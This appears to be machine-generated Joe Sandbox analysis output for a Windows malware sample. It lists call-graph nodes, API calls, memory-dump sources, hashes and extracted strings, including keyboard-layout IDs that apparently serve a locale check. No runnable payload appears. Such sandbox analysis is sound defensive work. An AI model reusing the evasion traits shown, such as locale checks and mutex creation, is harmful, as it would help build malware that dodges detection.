13063->13062 13064 cc5dc GetSystemTimePreciseAsFileTime 13063->13064 13065 be1fe 13064->13065 13066 cc19a 5 API calls 13065->13066 13067 be268 13066->13067 12898 b9ad5 12899 b9ad7 12898->12899 12900 b5b20 2 API calls 12899->12900 12901 b9be1 12900->12901 12902 b8a60 2 API calls 12901->12902 12903 b9bf2 12902->12903 12696 b99e8 12698 b99fc 12696->12698 12699 b9a38 12698->12699 12700 b5b20 2 API calls 12699->12700 12701 b9aac 12700->12701 12702 b8a60 2 API calls 12701->12702 12703 b9abd 12702->12703 12704 b5b20 2 API calls 12703->12704 12705 b9be1 12704->12705 12706 b8a60 2 API calls 12705->12706 12707 b9bf2 12706->12707 12726 eba2d 12727 eba57 12726->12727 12729 eba3d 12726->12729 12728 e683a 4 API calls 12727->12728 12727->12729 12728->12729 12163 b86e2 12164 b86e8 GetFileAttributesA 12163->12164 12165 b86e6 12163->12165 12166 b86f4 12164->12166 12165->12164 12547 b2060 12550 cc5bb 12547->12550 12549 b206c 12553 cc305 12550->12553 12552 cc5cb 12552->12549 12554 cc31b 12553->12554 12555 cc311 12553->12555 12554->12552 12556 cc2ee 12555->12556 12557 cc2ce 12555->12557 12566 ccc3a 12556->12566 12557->12554 12562 ccc05 12557->12562 12560 cc300 12560->12552 12563 cc2e7 12562->12563 12564 ccc13 InitializeCriticalSectionEx 12562->12564 12563->12552 12564->12563 12567 ccc4f RtlInitializeConditionVariable 12566->12567 12567->12560 12568 b8c60 12569 b8cb0 12568->12569 12570 b5b20 2 API calls 12569->12570 12571 b8cca 12570->12571 12580 baca0 12581 badf0 12580->12581 12583 bad0c 12580->12583 12583->12581 12584 e8979 12583->12584 12585 e8994 12584->12585 12586 e86d7 4 API calls 12585->12586 12587 e899e 12586->12587 12587->12583 12597 b40e0 12598 b412a 12597->12598 12600 b4172 12598->12600 12601 b3ea0 12598->12601 12603 b3f08 12601->12603 12604 b3ede 12601->12604 12602 b3f18 12602->12600 12603->12602 12607 b2bc0 12603->12607 12604->12600 12608 b2bce 12607->12608 12614 cb777 12608->12614 12610 b2c02 12611 b2c09 12610->12611 12620 b2c40 12610->12620 12611->12600 12613 b2c18 12615 cb784 12614->12615 12619 cb7a3 12614->12619 12623 ccaa7 12615->12623 12617 cb794 12617->12619 12625 cb74e 12617->12625 12619->12610 12631 cb72b 12620->12631 12622 b2c72 12622->12613 12624 ccac2 CreateThreadpoolWork 12623->12624 12624->12617 12626 cb757 12625->12626 12629 cccfc 12626->12629 12628 cb771 12628->12619 12630 ccd11 TpPostWork 12629->12630 12630->12628 12632 cb747 12631->12632 12633 cb737 12631->12633 12632->12622 12633->12632 12635 cc9a8 12633->12635 12636 cc9bd TpReleaseWork 12635->12636 12636->12632 12904 b86e0 12905 b86e8 GetFileAttributesA 12904->12905 12906 b86e6 12904->12906 12907 b86f4 12905->12907 12906->12905 13046 b3fa0 13047 b3fe2 13046->13047 13048 b404c 13047->13048 13049 b4092 13047->13049 13052 b3ff5 13047->13052 13053 b35a0 13048->13053 13050 b3ea0 3 API calls 13049->13050 13050->13052 13054 b35d6 13053->13054 13055 b2ca0 5 API calls 13054->13055 13058 b360e 13054->13058 13056 b365e 13055->13056 13057 b2bc0 3 API calls 13056->13057 13056->13058 13057->13058 13058->13052 12650 ba924 12659 b9160 12650->12659 12652 ba933 12653 b5b20 2 API calls 12652->12653 12658 ba9e3 12652->12658 12654 ba995 12653->12654 12655 b5b20 2 API calls 12654->12655 12656 ba9bd 12655->12656 12657 b5b20 2 API calls 12656->12657 12657->12658 12662 b91b4 12659->12662 12660 b5b20 2 API calls 12660->12662 12661 b9473 12661->12652 12662->12660 12667 b937f 12662->12667 12663 b5b20 2 API calls 12663->12667 12664 b97e5 12664->12652 12665 b96cf 12665->12664 12666 b5b20 2 API calls 12665->12666 12668 b9857 12666->12668 12667->12661 12667->12663 12667->12665 12668->12652 12682 e6974 12683 e698c 12682->12683 12684 e6982 12682->12684 12685 e68bd 4 API calls 12683->12685 12686 e69a6 12685->12686 12171 b86b0 12172 b86b6 12171->12172 12178 e6659 12172->12178 12175 b86d6 12177 b86d0 12185 e65a2 12178->12185 12180 b86c3 12180->12175 12181 e66e7 12180->12181 12182 e66f3 12181->12182 12184 e66fd 12182->12184 12201 e6670 12182->12201 12184->12177 12186 e65ae 12185->12186 12188 e65b5 12186->12188 12189 ea783 12186->12189 12188->12180 12190 ea78f 12189->12190 12193 ea827 12190->12193 12192 ea7aa 12192->12188 12195 ea84a 12193->12195 12196 ea890 12195->12196 12197 ed6ef 12195->12197 12196->12192 12200 ed6fc 12197->12200 12198 ed727 RtlAllocateHeap 12199 ed73a 12198->12199 12198->12200 12199->12196 12200->12198 12200->12199 12202 e6692 12201->12202 12204 e667d 12201->12204 12202->12204 12205 e9ef9 12202->12205 12204->12184 12206 e9f11 12205->12206 12208 e9f36 12205->12208 12206->12208 12209 f02f8 12206->12209 12208->12204 12210 f0304 12209->12210 12212 f030c 12210->12212 12213 f03ea 12210->12213 12212->12208 12214 f040c 12213->12214 12218 f0410 12213->12218 12214->12218 12219 eff91 12214->12219 12218->12212 12220 effa2 12219->12220 12222 effc5 12220->12222 12230 ea531 12220->12230 12222->12218 12223 efb7f 12222->12223 12224 efbcc 12223->12224 12263 e683a 12224->12263 12227 efe7b 12227->12218 12228 ec4ea GetPEB ExitProcess GetPEB RtlAllocateHeap 12229 efbdb 12228->12229 12229->12227 12229->12228 12229->12229 12271 ed2e9 12229->12271 12231 ea53b 12230->12231 12232 ed6ef RtlAllocateHeap 12231->12232 12235 ea554 12231->12235 12232->12235 12233 ea5e2 12233->12222 12235->12233 12237 e8aaf 12235->12237 12238 e8ab4 12237->12238 12242 e8abf 12238->12242 12243 ed4f4 12238->12243 12257 e651d 12242->12257 12244 ed500 12243->12244 12245 ed6db 12244->12245 12246 ed5e6 12244->12246 12248 ed611 12244->12248 12256 ed55c 12244->12256 12247 e651d 3 API calls 12245->12247 12246->12248 12260 ed4eb 12246->12260 12249 ed6ee 12247->12249 12251 ea531 4 API calls 12248->12251 12254 ed665 12248->12254 12248->12256 12251->12254 12253 ed4eb 4 API calls 12253->12248 12255 ea531 4 API calls 12254->12255 12254->12256 12255->12256 12256->12242 12258 e63f7 3 API calls 12257->12258 12259 e652e 12258->12259 12261 ea531 GetPEB ExitProcess GetPEB RtlAllocateHeap 12260->12261 12262 ed4f0 12261->12262 12262->12253 12264 e685a 12263->12264 12270 e6851 12263->12270 12265 ea531 4 API calls 12264->12265 12264->12270 12266 e687a 12265->12266 12276 eb4bb 12266->12276 12270->12229 12272 ea531 4 API calls 12271->12272 12273 ed2f4 12272->12273 12274 eb4bb 4 API calls 12273->12274 12275 ed304 12274->12275 12275->12229 12277 eb4ce 12276->12277 12279 e6890 12276->12279 12277->12279 12284 ef46b 12277->12284 12280 eb4e8 12279->12280 12281 eb4fb 12280->12281 12282 eb510 12280->12282 12281->12282 12291 ee571 12281->12291 12282->12270 12285 ef477 12284->12285 12286 ea531 4 API calls 12285->12286 12288 ef480 12286->12288 12287 ef4c6 12287->12279 12288->12287 12289 e8aaf 4 API calls 12288->12289 12290 ef4eb 12289->12290 12292 ea531 4 API calls 12291->12292 12293 ee57b 12292->12293 12296 ee489 12293->12296 12295 ee581 12295->12282 12297 ee495 12296->12297 12298 ee4b6 12297->12298 12299 e8aaf GetPEB ExitProcess GetPEB RtlAllocateHeap 12297->12299 12298->12295 12300 ee528 12299->12300 12301 ee564 12300->12301 12302 ea5ee GetPEB ExitProcess GetPEB RtlAllocateHeap 12300->12302 12301->12295 12303 ee555 12302->12303 12304 ee370 GetPEB ExitProcess GetPEB RtlAllocateHeap 12303->12304 12304->12301 12588 b88b0 12590 b8a1a 12588->12590 12591 b8908 12588->12591 12589 b5b20 2 API calls 12589->12591 12591->12589 12591->12590 12669 b2130 12670 cc62c InitializeCriticalSectionEx 12669->12670 12671 b213a 12670->12671 12672 b9930 12673 b996f 12672->12673 12674 b5b20 2 API calls 12673->12674 12675 b9977 12674->12675 12678 b8a60 12675->12678 12677 b9988 12679 b8aac 12678->12679 12680 b5b20 2 API calls 12679->12680 12681 b8ac7 12680->12681 12681->12677 12869 b4270 12872 b3a80 12869->12872 12871 b427b 12873 b3ab9 12872->12873 12874 b3290 6 API calls 12873->12874 12876 b3bf8 12873->12876 12877 b3af9 12873->12877 12874->12876 12875 b3290 6 API calls 12879 b3c1f 12875->12879 12876->12875 12876->12879 12877->12871 12878 b3c28 12878->12871 12879->12878 12880 b37d0 4 API calls 12879->12880 12881 b3c9b 12880->12881 12887 b82b0 12888 b8315 12887->12888 12889 b5b20 2 API calls 12888->12889 12892 b8333 12888->12892 12890 b8357 12889->12890 12891 b5b20 2 API calls 12890->12891 12891->12892 13068 ccff7 13069 cd007 13068->13069 13070 cd0af 13069->13070 13071 cd0ab RtlWakeAllConditionVariable 13069->13071 12730 b4236 12731 b23d0 5 API calls 12730->12731 12732 b423f 12731->12732 12882 b9e74 12883 b9e7c 12882->12883 12884 ba883 Sleep CreateMutexA 12883->12884 12886 b9f4f 12883->12886 12885 ba8be 12884->12885
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,000E645A,?,?,?,?,?,000E74AE), ref: 000E6496
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 209aba4a42a1f8b5660ed3287cf188fc6b295dc18f36240f7f4610ca056c0046
                                                                                                                                                                                                        • Instruction ID: f79dbcb5afe63be12a606fbd7e0d676c2d1f09c91c2fabc657e4a1237bfcd817
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209aba4a42a1f8b5660ed3287cf188fc6b295dc18f36240f7f4610ca056c0046
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE086701415886ECE297B16DC099893B9AEFA1390F044410FC085B272CB76EC82C981

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$p.gc$p.gc
                                                                                                                                                                                                        • API String ID: 0-3437345632
                                                                                                                                                                                                        • Opcode ID: 0c70567b82c03759c7e6c52a63252677b511bd369788ba5cabc1131a2ef4e815
                                                                                                                                                                                                        • Instruction ID: 5ed50b3d7599ad7d6e098bf173e5518e3d0af3a336a996f17a01ea1a49fc180b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c70567b82c03759c7e6c52a63252677b511bd369788ba5cabc1131a2ef4e815
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79F1A37090025CAFEB24DF54CC89BEDBBB9EF44304F5046A9E508A7282DB759B84CF95

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 329 b7d00-b7d82 call e4020 333 b7d88-b7db0 call c7870 call b5b20 329->333 334 b827e-b829b call ccf21 329->334 341 b7db2 333->341 342 b7db4-b7dd6 call c7870 call b5b20 333->342 341->342 347 b7dda-b7df3 342->347 348 b7dd8 342->348 351 b7df5-b7e04 347->351 352 b7e24-b7e4f 347->352 348->347 353 b7e1a-b7e21 call cd593 351->353 354 b7e06-b7e14 351->354 355 b7e51-b7e60 352->355 356 b7e80-b7ea1 352->356 353->352 354->353 357 b829c call e6b9a 354->357 359 b7e62-b7e70 355->359 360 b7e76-b7e7d call cd593 355->360 361 b7ea3-b7ea5 GetNativeSystemInfo 356->361 362 b7ea7-b7eac 356->362 370 b82a1-b82a6 call e6b9a 357->370 359->357 359->360 360->356 366 b7ead-b7eb6 361->366 362->366 368 b7eb8-b7ebf 366->368 369 b7ed4-b7ed7 366->369 372 b8279 368->372 373 b7ec5-b7ecf 368->373 374 b821f-b8222 369->374 375 b7edd-b7ee6 369->375 372->334 377 b8274 373->377 374->372 380 b8224-b822d 374->380 378 b7ef9-b7efc 375->378 379 b7ee8-b7ef4 375->379 377->372 382 b81fc-b81fe 378->382 383 b7f02-b7f09 378->383 379->377 384 b822f-b8233 380->384 385 b8254-b8257 380->385 386 b820c-b820f 382->386 387 b8200-b820a 382->387 388 b7fe9-b81e5 call c7870 call b5b20 call c7870 call b5b20 call b5c60 call c7870 call b5b20 call b5640 call c7870 call b5b20 call c7870 call b5b20 call b5c60 call c7870 call b5b20 call b5640 call c7870 call b5b20 call c7870 call b5b20 call b5c60 call c7870 call b5b20 call b5640 383->388 389 b7f0f-b7f6b call c7870 call b5b20 call c7870 call b5b20 call b5c60 383->389 390 b8248-b8252 384->390 391 b8235-b823a 384->391 392 b8259-b8263 385->392 393 b8265-b8271 385->393 386->372 395 b8211-b821d 386->395 387->377 428 b81eb-b81f4 388->428 414 b7f70-b7f77 389->414 390->372 391->390 397 b823c-b8246 391->397 392->372 393->377 395->377 397->372 416 b7f7b-b7f9b call e8a81 414->416 417 b7f79 414->417 423 b7f9d-b7fac 416->423 424 b7fd2-b7fd4 416->424 417->416 426 b7fae-b7fbc 423->426 427 b7fc2-b7fcf call cd593 423->427 424->428 429 b7fda-b7fe4 424->429 426->370 426->427 427->424 428->374 432 b81f6 428->432 429->428 432->382
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000B7EA3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
